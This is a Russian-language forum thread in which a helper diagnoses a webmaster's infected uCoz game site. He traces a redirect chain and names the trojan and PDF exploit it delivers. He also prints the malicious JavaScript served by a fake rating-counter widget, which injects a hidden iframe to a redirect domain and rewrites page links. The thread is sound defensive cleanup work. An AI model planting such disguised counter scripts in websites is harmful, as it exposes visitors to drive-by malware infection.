Проверьте пожалуйста сайт ввв.the-games.net.ru

[Nazaro4eG]

Проверьте пожалуйста сайт ввв.the-games.net.ru или первый домен ввв.the-game.ucoz.ru
На камп попадает вирус Backdoor.Win32.Bredavi и Exploit.Win32.Pidief, решил проверить сначала свой сайт.
Если несложно просто посмотрите эти сайты:
ввв.kentgames.ru
ввв.justgamez.net
ввв.allgamesone.ucoz.ru
ввв.forucoz.com

Если нет времени то их ненадо.
Заранее спс

 

[akok]

the-game.ucoz.ru - заражен.
Редирект

http://**.lank.jino.ru/got.php?sid=2

Который редиректит на

http://****net.cn/index.php?

При повторном заходе редиректит на

http://s24.ucoz.ru/index/0-4

Добавлено через 22 минуты 57 секунд

http://collection-****.ru/img/Banners/banner5.png

- что тут должно лежать?

Добавлено через 1 минуту 46 секунд
И это не нравится.

http://counter.***-marketolog.ru/counter/?mode=b3-5

Добавлено через 7 минут 43 секунды
Но "хвост хранится" в

<script src='http://ucoz-top.ru/***/?u=The-Games' language='javascript'></script>

Если посмотреть код который возвращает эта ссылка

document.write('<a href="http://ucoz-top.ru/" target="_blank"><img src="http://ucoz-top.ru/usite/The-Games/642e92efb79421734881b53e1e1b18b6/'+screen.width+'-'+screen.height+'/'+navigator.appCodeName+'-'+navigator.appVersion+'" alt="uCoz-Top.Ru - Топ рейтинг uCoz ресурсов." onMouseover="javascript:Info();" border="0" /><img src=http://data.alexa.com/data/7jiXhVpLR9byAc?cli=10&dat=snba&ver=7.2&cdt=alx_vw&wid=8033&act=00000000000&ss=1280x1024&bw=1523&t=0&ttl=645&vis=1&rq=80&url=http://ucoz-top.ru/ style="display:none;" /></a>');
var stats = '<iframe style="display:none;" [B]src="http://**.***.jino.ru/go.php?sid=2[/B]"></iframe>';document.write(stats);var chk=document.getElementById('uzcrsite');if(chk){function c_go(){window.open('http://ucoz-top.ru/')}var t1=document.getElementsByTagName('A');var t2=document.getElementsByTagName('SCRIPT');t1[0].innerHTML=t1[0].innerHTML.replace('Создать сайт','uCoz-Top.Ru - ТОП рейтинг');t1[0].innerHTML=t1[0].innerHTML.replace('Create a Website','uCoz-Top.Ru - TOP list');document.getElementsByTagName('DIV')[4].onclick=function(){c_go()};}
function Info(){_uWnd.alert("Рейтинг <b>uCoz</b> сайтов.<br>Регистрируйся!<br><a href='http://ucoz-top.ru/' target='_blank'>Подробнее...</a> ","uCoz-Top.Ru","{name:'utop',w:50,h:50,tm:15000,icon:'http://s102.ucoz.net/img/icon/tip.png'}");}

То можно заметить редирект который я описал выше.

офф
Не скажу, что было легко.

Пытаются забросить на компьютер пользователя:
Trojan-Downloader.Java.Agent.ac
Exploit.Win32.Pidief.cvy

 

[Nazaro4eG]

akoK, спс огромное, загляни ещё плизз. я вродь убрал хЗ

 

[akok]

Сейчас ничего интересного не вижу.

 

[Nazaro4eG]

akoK, спасибо огромное!